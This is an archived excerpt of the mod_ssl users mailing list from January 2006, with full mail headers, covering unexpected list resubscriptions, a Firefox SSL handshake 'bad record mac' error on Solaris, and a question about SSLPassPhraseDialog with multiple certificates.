X-Virus-Scanned: Symantec AntiVirus Scan Engine
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Reilly" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It happened to me as well.
----- Original Message ----- 
From: "Joachim Feise" 
To: 
Sent: Monday, January 23, 2006 11:56 AM
Subject: Re: Back in the ModSSL group?


> Kyle wrote on 01/23/06 06:55:
>
>> Hi, I quit this forum a while back, and today I am suddenly receiving
>> e-mails again.  What's going on?  How did I get back in the group?
>
>
> Ditto here.
>
>>
>> Can someone tell me how to opt-out again?  I no longer have any of my
>> old subscription info, and opt-out instructions aren't included in the
>> e-mails like other e-mail forums I use.
>
>
> It says
> Automated List Manager                            majordomo@modssl.org
> At the bottom of the mails. Just send an email to that address, and you 
> get the
> usual majordomo help email with unsubscribe info.
> I agree, though, that this should not have happened in the first place.
>
> -Joe
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 20:19:51 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ADA3414D84B; Mon, 23 Jan 2006 20:19:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from campbus.com (campbus.com [67.17.200.146])
	by master.modssl.org (Postfix) with ESMTP id 26F1314D829
	for ; Mon, 23 Jan 2006 20:19:50 +0100 (CET)
Received: from cbs7 (cbs7.campbus.com [192.168.1.112])
	by campbus.com (8.12.10/8.12.4) with SMTP id k0NJJs8U026565
	for ; Mon, 23 Jan 2006 14:19:54 -0500
Message-ID: <013801c62051$fbec8760$7001a8c0@cbs7>
From: "Ken Campney" 
To: 
References: <43D4EE66.6040301@ccidomain.com> <43D50AB7.3040205@ics.uci.edu> <008301c6204c$acbf7670$6702a8c0@kamdesigns>
Subject: Re: Back in the ModSSL group?
Date: Mon, 23 Jan 2006 14:19:51 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2741.2600
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2742.200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Campney" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

ditto

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 20:27:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A806B14D84B; Mon, 23 Jan 2006 20:27:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mtaout-m.tc.umn.edu (mtaout-m.tc.umn.edu [160.94.23.21])
	by master.modssl.org (Postfix) with ESMTP id 054F714D829
	for ; Mon, 23 Jan 2006 20:27:00 +0100 (CET)
Received: from omwl587lap (omwl-587-lap.lib.umn.edu [128.101.98.71]) by mtaout-m.tc.umn.edu with ESMTP for modssl-users@modssl.org; Mon, 23 Jan 2006 13:26:58 -0600 (CST)
X-Umn-Remote-Mta: [N] omwl-587-lap.lib.umn.edu [128.101.98.71] #+LO+TS+AU+HN
Message-Id: 
From: "Jeffrey M. Johnson" 
To: 
Subject: RE: Back in the ModSSL group?
Date: Mon, 23 Jan 2006 13:26:55 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
In-Reply-To: <013801c62051$fbec8760$7001a8c0@cbs7>
Thread-Index: AcYgUhd7D5wRxbdIRveCU0biP7OAsgAANLyA
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeffrey M. Johnson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am just happy to see the list back since it hasn't worked in a few
months....

Jeff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 20:41:29 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 175DD14D84A; Mon, 23 Jan 2006 20:41:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uproxy.gmail.com (uproxy.gmail.com [66.249.92.202])
	by master.modssl.org (Postfix) with ESMTP id DDF0914D829
	for ; Mon, 23 Jan 2006 20:41:28 +0100 (CET)
Received: by uproxy.gmail.com with SMTP id u40so13534ugc
        for ; Mon, 23 Jan 2006 11:41:27 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=HgFPRqqjNFc6Rhn2bt057l5WWJLFn4Q1lUNJ9JorpOmyl/XQ5SuB9G4IO8j1cXci8tvF5Elk56le+wd3F6g7azJCgYvOKOArff20BP37nAjlmnQPDrWUap0qlb3dFc7scRQlqlL3Mv9iI8vPjdQDqiTkpgpqv+rRTNZn5RHMO8g=
Received: by 10.48.232.18 with SMTP id e18mr367678nfh;
        Mon, 23 Jan 2006 11:15:16 -0800 (PST)
Received: by 10.49.11.6 with HTTP; Mon, 23 Jan 2006 11:15:16 -0800 (PST)
Message-ID: 
Date: Mon, 23 Jan 2006 14:15:16 -0500
From: BJ Swope 
To: modssl-users@modssl.org
Subject: Re: Back in the ModSSL group?
In-Reply-To: <008301c6204c$acbf7670$6702a8c0@kamdesigns>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_18756_32880358.1138043716349"
References: <43D4EE66.6040301@ccidomain.com> <43D50AB7.3040205@ics.uci.edu>
	 <008301c6204c$acbf7670$6702a8c0@kamdesigns>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: BJ Swope 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_18756_32880358.1138043716349
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Until the "me toos" this list received about 1 mail a month...

On 1/23/06, Peter Reilly  wrote:
>
> It happened to me as well.
> ----- Original Message -----
> From: "Joachim Feise" 
> To: 
> Sent: Monday, January 23, 2006 11:56 AM
> Subject: Re: Back in the ModSSL group?
>
>
> > Kyle wrote on 01/23/06 06:55:
> >
> >> Hi, I quit this forum a while back, and today I am suddenly receiving
> >> e-mails again.  What's going on?  How did I get back in the group?
> >
> >
> > Ditto here.
> >
> >>
> >> Can someone tell me how to opt-out again?  I no longer have any of my
> >> old subscription info, and opt-out instructions aren't included in the
> >> e-mails like other e-mail forums I use.
> >
> >
> > It says
> > Automated List Manager                            majordomo@modssl.org
> > At the bottom of the mails. Just send an email to that address, and you
> > get the
> > usual majordomo help email with unsubscribe info.
> > I agree, though, that this should not have happened in the first place.
> >
> > -Joe
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>



--
"But we also know the dangers of a religion that severs its links with
reason and becomes prey to fundamentalism" --  Cardinal Paul Poupard
"It morphs into the Republican party!"  -- BJ

------=_Part_18756_32880358.1138043716349
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Until the "me toos" this list received about 1 mail a month...
On 1/23/06, Peter Reilly <preilly@=
earthlink.net
> wrote:
It happened to me as well.
----- Original Message -----
From: &q=
uot;Joachim Feise" <
jfeise@ics.uci.edu>
To: <=
;modssl-users@modssl.org>=

Sent: Monday, January 23, 2006 11:56 AM
Subject: Re: Back in the Mod=
SSL group?



> Kyle wrote on 01/23/06 06:55:
>
>> Hi, I qu=
it this forum a while back, and today I am suddenly receiving
>> e=
-mails again.  What's going on?  How did I get back in =
the group?
>

>
> Ditto here.
>
>>
>> Can someone te=
ll me how to opt-out again?  I no longer have any of my
>&g=
t; old subscription info, and opt-out instructions aren't included in the>> e-mails like other e-mail forums I use.

>
>
> It says
>
Automated List
Manager           &n=
bsp;            =
;    majordomo@=
modssl.org
> At the bottom of the mails. Just send an email to th=
at address, and you
> get the
> usual majordomo help email with=
 unsubscribe info.

> I agree, though, that this should not have happened in the first p=
lace.
>
> -Joe
> ________________________________________=
______________________________
>
Apache Interface to OpenSSL
(mod_ssl)           =
       
www.modssl.org
> User Support M=
ailing
List            =
;          modssl-users@modssl.org
>
Automated List
Manager           &n=
bsp;            =
;    majordomo@=
modssl.org

_____________________________________________________=
_________________
Apache
Interface to OpenSSL
(mod_ssl)           =
       
www.modssl.org
User Support Mailin=
g
List            =
;          modssl-users@modssl.org
Automated
List
Manager           &n=
bsp;            =
;    majordomo@=
modssl.org



-- 
"=
;But
we also know the dangers of a religion that severs its links with
reason and becomes prey to fundamentalism" --  Cardinal Paul
Poupard
"It morphs into the Republican party!"  -- B=
J

------=_Part_18756_32880358.1138043716349--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 20:45:56 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B57B214D84A; Mon, 23 Jan 2006 20:45:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id A518614D829
	for ; Mon, 23 Jan 2006 20:45:54 +0100 (CET)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id k0NJjbgt002205
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Mon, 23 Jan 2006 11:45:37 -0800 (PST)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.4/8.13.4) with ESMTP id k0NJjlJf030181
	for ; Mon, 23 Jan 2006 11:45:47 -0800
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.4/8.13.4/Submit) id k0NJjlRj030180
	for modssl-users@modssl.org; Mon, 23 Jan 2006 11:45:47 -0800
Date: Mon, 23 Jan 2006 11:45:47 -0800
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: Back in the ModSSL group?
Message-ID: <20060123194546.GG28077@ligo.caltech.edu>
References: <43D4EE66.6040301@ccidomain.com> <43D50AB7.3040205@ics.uci.edu> <008301c6204c$acbf7670$6702a8c0@kamdesigns> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Shoe-Size: 9-1/2
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 2715151 - 7cfd26394eb1
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

BJ Swope wrote:
> Until the "me toos" this list received about 1 mail a month...

And generally about old versions of the module.

--=20
Phil Ehrens | Fun stuff:
The LIGO Laboratory, MS 18-34         | http://www.ralphmag.org
California Institute of Technology    | http://www.yellow5.com
1200 East California Blvd.            | http://www.tokyotosho.com
Pasadena, CA 91125 USA                | My gpg public key:
Phone:(626)395-8518 Fax:(626)793-9744 | http://www.imbe.net/peligo.asc
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 24 09:59:00 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E68E314D84D; Tue, 24 Jan 2006 09:59:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uproxy.gmail.com (uproxy.gmail.com [66.249.92.201])
	by master.modssl.org (Postfix) with ESMTP id B63E014D830
	for ; Tue, 24 Jan 2006 09:59:00 +0100 (CET)
Received: by uproxy.gmail.com with SMTP id u40so170317ugc
        for ; Tue, 24 Jan 2006 00:58:59 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=RZV2So1PHNSEpVv7X6vmQcuKTTx92pofXTnHMMzekEgKXGZuPwrq4tluApobvzhORaNHJodJ8eT7L6dmAjYsqeDP41gXC+YfuXcaBLNpopUKaJyPoTkjIuJLftf8y5831+qv3u2zploTupd6yy/EcdBmxfjTAOlME0445QlX4do=
Received: by 10.48.217.14 with SMTP id p14mr425149nfg;
        Tue, 24 Jan 2006 00:58:59 -0800 (PST)
Received: by 10.49.42.18 with HTTP; Tue, 24 Jan 2006 00:58:59 -0800 (PST)
Message-ID: <8d0b863b0601240058wae4871fibe3a40856dc5110a@mail.gmail.com>
Date: Tue, 24 Jan 2006 08:58:59 +0000
From: Michael Smith 
To: modssl-users@modssl.org
Subject: Re: Errors with firefox
In-Reply-To: <6590499E45A50D45A2858E70FBF14BA5017E5B70@aplesjustice.dom1.jhuapl.edu>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_12251_19215323.1138093139206"
References: <6590499E45A50D45A2858E70FBF14BA5017E5B70@aplesjustice.dom1.jhuapl.edu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_12251_19215323.1138093139206
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hi there,

We don't appear to have an packaged openssl on this system so I don't think
that is my particular problem.  However I'm somewhat reassured in that othe=
r
people are seeing this too so it's hopefully not something too stupid that
I'm doing!

Michael

On 1/23/06, Yu, Ming  wrote:
>
>  I had exactly the same problem when I compile my new Apache server (2.2.=
0)
> with mod_ssl.  To be short, I think you are using the packaged OpenSSL.  =
I
> fixed the problem by re-compiling the OpenSSL on the system with shared
> option, but first remove the pre-installed OpenSSL package.
>
>
>
> -          Ming Yu
>
> -          Johns Hopkins University Applied Physics Lab.
>
>
>  ------------------------------
>
> *From:* owner-modssl-users@modssl.org [mailto:
> owner-modssl-users@modssl.org] *On Behalf Of *Michael Smith
> *Sent:* Monday, January 23, 2006 9:20 AM
> *To:* modssl-users@modssl.org
> *Subject:* Errors with firefox
>
>
>
> Hello there
>
> Not sure if the underlying problem here is with mod_ssl or openssl or
> something else - so apologies if this email is going to the wrong place.
>
> I have apache compiled on solaris with sun cc with mod_ssl- 2.8.25-1.3.34=
and
> openssl-0.9.8a (I've also tried 0.9.7i).
>
> When accessing the site using Internet Explorer I have no problems.  With
> Firefox the browser reports an 'incorrect Message Authentication Code' an=
d
> the server logs report:
>
> [Mon Jan 23 13:13:54 2006] [error] mod_ssl: SSL handshake failed (server
> xxx:443, client xxx) (OpenSSL library error follows)
> [Mon Jan 23 13:13:54 2006] [error] OpenSSL: error:1408F455:SSL
> routines:SSL3_GET_RECORD:decryption failed or bad record mac
>
> I do have previous builds that 'work' ... but have been unable to
> determine precisely what change initiated this problem.  One possible
> suspect is the Sun compiler, which was now from studio 11 and was previou=
sly
> from an earlier version which I don't have access to any more.
>
> Any suggestions much appreciated
>
> Thanks
>
> Michael Smith
>
>
>

------=_Part_12251_19215323.1138093139206
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hi there,

We don't appear to have an packaged openssl on this system=
 so I don't think that is my particular problem.  However I'm somewhat=
 reassured in that other people are seeing this too so it's hopefully not s=
omething too stupid that I'm doing!


Michael

On 1/23/06, Yu, Ming <Ming.Yu@jhuapl.edu> wrote:

















I had exactly the same problem whe=
n I
compile my new Apache server (2.2.0) with mod_ssl.  To be short, I thi=
nk you
are using the packaged OpenSSL.  I fixed the problem by re-compiling t=
he
OpenSSL on the system with shared option, but first remove the pre-installe=
d
OpenSSL package.



 



-&n=
bsp;        
Mi=
ng Yu



-&n=
bsp;        
Jo=
hns
Hopkins University Applied Physics Lab.  



 















From:
owner-modssl-users@modssl=
.org [mailto:
owner-modssl-users@modssl.org] On=
 Behalf Of Michael Smith

Sent: Monday, January 23, =
2006
9:20 AM

To: modssl-users@modssl.org

Subject: Errors with firef=
ox






 



Hello there



Not sure if the underlying problem here is with mod_ssl or openssl or somet=
hing
else - so apologies if this email is going to the wrong place.



I have apache compiled on solaris with sun cc with mod_ssl- 2.8.25-1.3.34 a=
nd
openssl-0.9.8a (I've also tried 0.9.7i).



When accessing the site using Internet Explorer I have no problems.  W=
ith
Firefox the browser reports an 'incorrect Message Authentication Code' and =
the
server logs report: 



[Mon Jan 23 13:13:54 2006] [error] mod_ssl: SSL handshake failed (server
xxx:443, client xxx) (OpenSSL library error follows)

[Mon Jan 23 13:13:54 2006] [error] OpenSSL: error:1408F455:SSL
routines:SSL3_GET_RECORD:decryption failed or bad record mac 



I do have previous builds that 'work' ... but have been unable to determine
precisely what change initiated this problem.  One possible suspect is=
 the
Sun compiler, which was now from studio 11 and was previously from an earli=
er
version which I don't have access to any more. 



Any suggestions much appreciated



Thanks



Michael Smith



















------=_Part_12251_19215323.1138093139206--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 28 19:38:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C90CA14D845; Sat, 28 Jan 2006 19:38:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from r1d20.webazilla.com (r1d20.webazilla.com [83.149.88.237])
	by master.modssl.org (Postfix) with ESMTP id 5940A14D82A
	for ; Sat, 28 Jan 2006 19:38:01 +0100 (CET)
Received: from [10.8.0.6] ([10.8.0.6])
	(authenticated bits=0)
	by r1d20.webazilla.com (8.13.5/8.13.5) with ESMTP id k0SIbgW5091400
	for ; Sat, 28 Jan 2006 19:37:43 +0100 (CET)
	(envelope-from bk@syshalt.com)
Message-ID: <43DBB9F4.4090503@syshalt.com>
Date: Sat, 28 Jan 2006 20:37:40 +0200
From: "Konstantin N. Bezruchenko" 
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSLPassPhraseDialog & several certificates
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Webazilla-MailScanner-Information: Please contact the ISP for more information
X-Webazilla-MailScanner: Not scanned: please contact your Internet E-Mail Service Provider for details
X-Webazilla-MailScanner-SpamCheck: not spam, SpamAssassin (score=-5.899,
	required 10, autolearn=not spam, ALL_TRUSTED -3.30, BAYES_00 -2.60)
X-Webazilla-MailScanner-From: bk@syshalt.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Konstantin N. Bezruchenko" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Greetings,

I need setup new virtualhost with ssl certificate, and i dont want enter 
passwords every time when apache restarts. When i have only one 
certificate i use:

SSLPassPhraseDialog exec:/path/to/apache/bin/startssl.pl

I try set two SSLPassPhraseDialog with two different exec scripts, but 
apache could not start. When i enter password manually - everything is ok.

So how can i use SSLPassPhraseDialog for 2 certificates what require 
passwords?

I use latest apache 1.3 with latest mod_ssl

Thanks.

-- 
Konstantin N. Bezruchenko | BK5536-RIPE
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 28 22:01:28 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4C74914D859; Sat, 28 Jan 2006 22:01:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (frfcqmg011ix3r8.montpellier.mebs.ihost.com [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id 9009614D82A
	for ; Sat, 28 Jan 2006 22:01:25 +0100 (CET)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com ([10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11/8.12.11) with ESMTP id k0SKqKYJ010570
	for ; Sat, 28 Jan 2006 21:52:25 +0100
Subject: Jean-Pierre Guilloteau est absent(e).
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Sat, 28 Jan 2006 22:01:07 +0100
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(603HF91 | October 29, 2003) at
 01/28/2006 10:01:16 PM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





Je serai absent(e) du  28/01/2006 au 06/02/2006.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Vous pouvez en mon absence contacter Aspaway au 01 46 67 88 88.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 30 13:23:11 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D00E714D86E; Mon, 30 Jan 2006 13:23:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uproxy.gmail.com (uproxy.gmail.com [66.249.92.200])
	by master.modssl.org (Postfix) with ESMTP id 7513F14D82A
	for ; Mon, 30 Jan 2006 13:23:11 +0100 (CET)
Received: by uproxy.gmail.com with SMTP id s2so840070uge
        for ; Mon, 30 Jan 2006 04:23:10 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=aPVan49fMWrtM7aAVio0Kbvpv8N0UUPBQpbdXZb186KJYYvnnDPCnaPZ0DiZT70bYroTuDMJtBx3hJjHvZHltnhieTOU1HLHTNdGLzIsyUcxOuAOhkjxCVlCMSMbqrDtPuFxnbxjUMbQBj3u+drAjq9lEESEYWD5ZVMJpmuXqAE=
Received: by 10.48.250.5 with SMTP id x5mr955359nfh;
        Mon, 30 Jan 2006 04:15:54 -0800 (PST)
Received: by 10.49.11.6 with HTTP; Mon, 30 Jan 2006 04:15:54 -0800 (PST)
Message-ID: 
Date: Mon, 30 Jan 2006 07:15:54 -0500
From: BJ Swope 
To: modssl-users@modssl.org
Subject: Re: SSLPassPhraseDialog & several certificates
In-Reply-To: <43DBB9F4.4090503@syshalt.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_16392_16194582.1138623354886"
References: <43DBB9F4.4090503@syshalt.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: BJ Swope 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_16392_16194582.1138623354886
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 1/28/06, Konstantin N. Bezruchenko  wrote:
>
> Greetings,
>
> I need setup new virtualhost with ssl certificate, and i dont want enter
> passwords every time when apache restarts. When i have only one
> certificate i use:
>
> SSLPassPhraseDialog exec:/path/to/apache/bin/startssl.pl
>
> I try set two SSLPassPhraseDialog with two different exec scripts, but
> apache could not start. When i enter password manually - everything is ok=
.
>
> So how can i use SSLPassPhraseDialog for 2 certificates what require
> passwords?


Why not save the certificates without passphrases?



--
"But we also know the dangers of a religion that severs its links with
reason and becomes prey to fundamentalism" --  Cardinal Paul Poupard
"It morphs into the Republican party!"  -- BJ

------=_Part_16392_16194582.1138623354886
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline



On 1/28/06, Konstantin N. Bezruchenko <bk@syshalt.com> wrote:

Greetings,

I need setup new virtualhost with ssl certificate, and i =
dont want enter
passwords every time when apache restarts. When i have o=
nly one
certificate i use:

SSLPassPhraseDialog exec:/path/to/apac=
he/bin/startssl.pl


I try set two SSLPassPhraseDialog with two different exec scripts, =
but
apache could not start. When i enter password manually - everything =
is ok.

So how can i use SSLPassPhraseDialog for 2 certificates what =
require

passwords?


Why not save the certificates without passphrases? 





-- 
"But we also know the
dangers of a religion that severs its links with reason and becomes
prey to fundamentalism" --  Cardinal Paul Poupard
"I=
t morphs into the Republican party!"  -- BJ

------=_Part_16392_16194582.1138623354886--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 30 13:38:51 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 519F214D86E; Mon, 30 Jan 2006 13:38:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from r1d20.webazilla.com (r1d20.webazilla.com [83.149.88.237])
	by master.modssl.org (Postfix) with ESMTP id 231ED14D82A
	for ; Mon, 30 Jan 2006 13:38:50 +0100 (CET)
Received: from [10.8.0.182] ([10.8.0.182])
	(authenticated bits=0)
	by r1d20.webazilla.com (8.13.5/8.13.5) with ESMTP id k0UCcZ7O096674
	for ; Mon, 30 Jan 2006 13:38:36 +0100 (CET)
	(envelope-from bk@syshalt.com)
Message-ID: <43DE08CB.4090202@syshalt.com>
Date: Mon, 30 Jan 2006 14:38:35 +0200
From: "Konstantin N. Bezruchenko" 
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLPassPhraseDialog & several certificates
References: <43DBB9F4.4090503@syshalt.com> 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Webazilla-MailScanner-Information: Please contact the ISP for more information
X-Webazilla-MailScanner: Not scanned: please contact your Internet E-Mail Service Provider for details
X-Webazilla-MailScanner-SpamCheck: not spam, SpamAssassin (score=-5.899,
	required 10, autolearn=not spam, ALL_TRUSTED -3.30, BAYES_00 -2.60)
X-Webazilla-MailScanner-From: bk@syshalt.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Konstantin N. Bezruchenko" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Greetings,

BJ Swope wrote:

>>     So how can i use SSLPassPhraseDialog for 2 certificates what require
>>     passwords?
> 
> Why not save the certificates without passphrases?

Because we already have password-protected certificates, and as i know 
we cant remove password protection from existing certificate.

-- 
Konstantin N. Bezruchenko | BK5536-RIPE
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 30 13:51:06 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8D39D14D86E; Mon, 30 Jan 2006 13:51:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
